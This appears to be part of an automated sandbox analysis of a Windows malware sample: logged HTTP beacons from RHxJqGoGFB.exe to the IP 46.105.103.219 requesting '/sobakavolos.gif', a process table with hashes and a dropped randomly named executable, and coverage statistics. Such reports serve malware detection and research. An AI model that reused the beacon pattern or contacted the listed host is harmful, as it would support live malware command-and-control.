                                                                                                          Nov 26, 2024 11:45:38.932332039 CET166OUTGET /sobakavolos.gif?dae7c7e6=-1244688436 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          43192.168.2.45005046.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:44.030368090 CET166OUTGET /sobakavolos.gif?deb2d253=-1676118279 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          44192.168.2.45005146.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:48.852309942 CET165OUTGET /sobakavolos.gif?e40c8c88=-937879280 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          45192.168.2.45005246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:53.888876915 CET164OUTGET /sobakavolos.gif?e7c0a656=226918236 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          46192.168.2.45005346.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:58.724412918 CET166OUTGET /sobakavolos.gif?eaf3a57c=-2118786840 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          47192.168.2.45005446.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:46:03.644506931 CET165OUTGET /sobakavolos.gif?ee5adceb=1926686552 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:05:42:02
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\RHxJqGoGFB.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:68'608 bytes
                                                                                                          MD5 hash:4F7FA0B66A6E153089AB00199B04356B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:1
                                                                                                          Start time:05:42:02
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:2
                                                                                                          Start time:05:42:03
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"fontdrvhost.exe"
                                                                                                          Imagebase:0x7ff72c440000
                                                                                                          File size:827'408 bytes
                                                                                                          MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:3
                                                                                                          Start time:05:42:03
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"fontdrvhost.exe"
                                                                                                          Imagebase:0x7ff72c440000
                                                                                                          File size:827'408 bytes
                                                                                                          MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:4
                                                                                                          Start time:05:42:03
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                                                                                          Imagebase:0x7ff62bac0000
                                                                                                          File size:1'663'328 bytes
                                                                                                          MD5 hash:9B8DE9D4EDF68EEF2C1E490ABC291567
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:5
                                                                                                          Start time:05:42:03
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\dwm.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"dwm.exe"
                                                                                                          Imagebase:0x7ff74e710000
                                                                                                          File size:94'720 bytes
                                                                                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:7
                                                                                                          Start time:05:42:06
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:8
                                                                                                          Start time:05:42:12
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\sihost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:sihost.exe
                                                                                                          Imagebase:0x7ff796ef0000
                                                                                                          File size:111'616 bytes
                                                                                                          MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:9
                                                                                                          Start time:05:42:17
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:10
                                                                                                          Start time:05:42:18
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:12
                                                                                                          Start time:05:42:19
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\ctfmon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"ctfmon.exe"
                                                                                                          Imagebase:0x7ff7e3b00000
                                                                                                          File size:11'264 bytes
                                                                                                          MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:13
                                                                                                          Start time:05:42:20
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:16
                                                                                                          Start time:05:42:23
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:17
                                                                                                          Start time:05:42:24
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                          Imagebase:0x7ff7da970000
                                                                                                          File size:793'416 bytes
                                                                                                          MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:18
                                                                                                          Start time:05:42:27
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:19
                                                                                                          Start time:05:42:27
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                          Imagebase:0x7ff6fdaa0000
                                                                                                          File size:3'671'400 bytes
                                                                                                          MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:20
                                                                                                          Start time:05:42:50
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:21
                                                                                                          Start time:05:42:51
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\smartscreen.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                          Imagebase:0x7ff7d45b0000
                                                                                                          File size:2'378'752 bytes
                                                                                                          MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:05:42:52
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                          Imagebase:0x7ff794e20000
                                                                                                          File size:19'232 bytes
                                                                                                          MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:23
                                                                                                          Start time:05:42:54
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:24
                                                                                                          Start time:05:42:56
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:25
                                                                                                          Start time:05:42:56
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                          Imagebase:0x7ff7d5d50000
                                                                                                          File size:78'456 bytes
                                                                                                          MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:26
                                                                                                          Start time:05:42:59
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                          Imagebase:0x7ff63cc40000
                                                                                                          File size:19'456 bytes
                                                                                                          MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:27
                                                                                                          Start time:05:42:59
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:28
                                                                                                          Start time:05:43:00
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                          Imagebase:0x7ff614e70000
                                                                                                          File size:98'104 bytes
                                                                                                          MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:29
                                                                                                          Start time:05:43:05
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff69a060000
                                                                                                          File size:57'856 bytes
                                                                                                          MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:30
                                                                                                          Start time:05:43:05
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:31
                                                                                                          Start time:05:43:06
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          Imagebase:0x7ff70f330000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:32
                                                                                                          Start time:05:43:07
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:33
                                                                                                          Start time:05:43:07
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:34
                                                                                                          Start time:05:43:08
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:35
                                                                                                          Start time:05:43:08
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:36
                                                                                                          Start time:05:43:08
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:37
                                                                                                          Start time:05:43:09
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:38
                                                                                                          Start time:05:43:09
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:39
                                                                                                          Start time:05:43:09
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:40
                                                                                                          Start time:05:43:10
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:41
                                                                                                          Start time:05:43:10
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:42
                                                                                                          Start time:05:43:10
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
                                                                                                          Imagebase:0xa60000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:19.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:18.8%
                                                                                                            Total number of Nodes:1901
                                                                                                            Total number of Limit Nodes:56
